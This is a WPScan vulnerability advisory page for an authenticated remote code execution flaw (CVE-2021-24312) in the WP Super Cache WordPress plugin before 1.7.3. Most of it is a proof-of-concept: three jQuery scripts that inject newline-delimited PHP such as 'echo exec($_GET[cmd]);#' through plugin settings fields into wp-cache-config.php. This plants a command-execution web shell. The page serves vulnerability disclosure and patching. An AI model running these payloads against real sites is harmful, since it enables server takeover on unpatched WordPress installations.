WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

WP Super Cache < 1.7.3 - Authenticated Remote Code Execution

Description

The parameters $cache_path, $wp_cache_debug_ip, $wp_super_cache_front_page_text, $cache_scheduled_time, $cached_direct_pages used in the plugin settings result in RCE because they allow input of "$" and "\n". This is due to an incomplete fix of CVE-2021-24209.

You can run the command directly to "https://target/wp-content/wp-cache-config.php".

Proof of Concept

//Exploit $cache_path

url = 'http://wp.lab/wordpress/wp-admin/options-general.php?page=wpsupercache&tab=settings';
jQuery.get(url,function(e){
  jQuery.post(url,{
      "action": "scupdates",
      "_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1],
      "wp_cache_enabled": 1,
      "wp_cache_location": "/tmp/\n$cache_path\necho exec($_GET[cmd]);#"
  })
  console.log('SET!');
}).then(()=>{

  jQuery.get(url,function(e){
      jQuery.post(url,{
          "action": "scupdates",
          "_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1],
          "wp_cache_enabled": 1,
          "wp_cache_location": "./"
      })
  });
  console.log('EXPLOIT!');
});


//Exploit $wp_cache_debug_ip, $wp_super_cache_front_page_text

url = 'http://[Target]/WordPress/wp-admin/options-general.php?page=wpsupercache&tab=debug';	
jQuery.get(url,function(e){
  jQuery.post(url,{
      "wp_cache_debug": 1,
      "_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1],
      "wp_cache_debug_ip": "/tmp/\n$wp_cache_debug_ip\necho exec($_GET[cmd]);#"
      //"wp_super_cache_front_page_text": "/tmp/\n$wp_super_cache_front_page_text\necho exec($_GET[cmd]);#"
  })
  console.log('SET!');
}).then(()=>{

  jQuery.get(url,function(e){
      jQuery.post(url,{
      "wp_cache_debug": 1,
      "_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1],
      "wp_cache_debug_ip": "1"
      //"wp_super_cache_front_page_text": "1"
      })
  });
  console.log('EXPLOIT!');
});


//Exploit $cache_scheduled_time + $cached_direct_pages

url = 'http://[Target]/WordPress/wp-admin/options-general.php?page=wpsupercache&tab=settings';	
jQuery.get(url,function(e){
  jQuery.post(url,{
      "action": "scupdates",
      "wp_cache_enabled": "1",
      "_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1]
  })
  console.log('SET1!');
}).then(()=>{

  jQuery.get(url,function(e){
      jQuery.post(url,{
      "action":"expirytime",
      "cache_scheduled_time": "\n`:00",
      "_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1],
      "new_direct_page":"`;echo`$_GET[cmd]`;#"
      })
  }).then(()=>{
    
      console.log('EXPLOIT!');
      jQuery.get(url,function(e){
          jQuery.post(url,{
          "action":"expirytime",
          "cache_scheduled_time": "00:00",
          "_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1],
          "new_direct_page":"`;echo`$_GET[cmd]`;#"
          })
      })

  });
  console.log('SET2!');
});

Affects Plugins

wp-super-cache
Fixed in version 1.7.3

References

CVE
CVE-2021-24312
URL
https://plugins.trac.wordpress.org/changeset/2522794/wp-super-cache

Classification

Type

RCE

OWASP top 10
A1: Injection
CWE
CWE-94

Miscellaneous

Original Researcher

NGA

Submitter

NGA

Verified

Yes

WPVDB ID
2142c3d3-9a7f-4e3c-8776-d469a355d62f

Timeline

Publicly Published

2021-05-14 (about 1 years ago)

Added

2021-05-14 (about 1 years ago)

Last Updated

2021-05-15 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin